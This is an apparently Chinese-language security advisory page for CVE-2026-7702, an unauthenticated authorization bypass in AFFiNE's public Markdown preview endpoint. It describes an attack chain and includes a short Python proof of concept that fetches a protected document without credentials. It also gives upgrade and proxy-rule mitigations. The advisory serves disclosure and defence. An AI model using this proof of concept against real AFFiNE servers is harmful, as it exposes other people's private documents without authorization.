CVE-2026-7702 CVSS 5.3 中危

CVE-2026-7702 AFFiNE授权绕过漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7702

漏洞类型

授权绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

toeverything AFFiNE

漏洞概述

Toeverything AFFiNE在版本0.26.3及之前存在一个安全漏洞。该漏洞位于Public Markdown Preview Endpoint组件的`allowDocPreview`函数中。由于授权验证逻辑存在缺陷，攻击者可以在无需认证的情况下，通过网络远程绕过授权机制，访问并预览本应受保护的文档内容。目前该漏洞利用方式已公开，厂商尚未对此做出响应。

技术细节

该漏洞源于AFFiNE的Public Markdown Preview Endpoint组件中，文件路径`/workspace/:workspaceId/:docId`下的`allowDocPreview`函数未正确实施访问控制检查。在正常逻辑中，访问特定工作区下的文档应验证用户的身份及权限。然而，受影响版本的AFFiNE在处理该预览请求时，存在逻辑缺陷，导致系统跳过了关键的授权验证步骤。攻击者无需任何用户交互或身份认证，仅需构造包含目标`workspaceId`和`docId`的恶意URL请求，即可远程触发该漏洞。这使得攻击者能够绕过系统的安全边界，直接获取敏感文档的Markdown源码或预览内容，造成信息泄露。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用的是存在漏洞的AFFiNE版本（<= 0.26.3）。

STEP 2

资源枚举

攻击者通过猜测或利用信息泄露获取目标的Workspace ID和Doc ID。

STEP 3

漏洞利用

攻击者直接向`/workspace/{workspaceId}/{docId}`端点发送HTTP GET请求，且不携带任何认证信息。

STEP 4

数据窃取

由于`allowDocPreview`函数未校验权限，服务器返回受保护文档的Markdown内容，攻击者成功读取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL configuration
target_base = "http://target-host.com"
workspace_id = "workspace_uuid_here"
doc_id = "doc_uuid_here"

# The vulnerable endpoint
vuln_url = f"{target_base}/workspace/{workspace_id}/{doc_id}"

try:
    # Send request without authentication cookies or headers
    response = requests.get(vuln_url, timeout=10)

    # Check if the authorization was bypassed
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print(f"[+] Content Length: {len(response.text)}")
        print(f"[+] Response Snippet: {response.text[:200]}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")

except Exception as e:
    print(f"[!] Error occurred: {e}")

影响范围

toeverything AFFiNE <= 0.26.3

防御指南

临时缓解措施

建议立即升级至官方修复版本。若暂时无法升级，应在反向代理层（如Nginx）添加规则，禁止未认证用户访问包含`/workspace/`路径的接口，或直接禁用Public Markdown Preview功能，直到完成修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7702
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7702
3 Details https://www.cvedetails.com/cve/CVE-2026-7702/
4 VulDB https://vuldb.com/cve/CVE-2026-7702
5 Link https://github.com/ngocnn97/security-advisories/blob/main/AFFiNE_BAC_PoC.mp4
6 Link https://vuldb.com/submit/804455
7 Link https://vuldb.com/vuln/360871
8 Link https://vuldb.com/vuln/360871/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表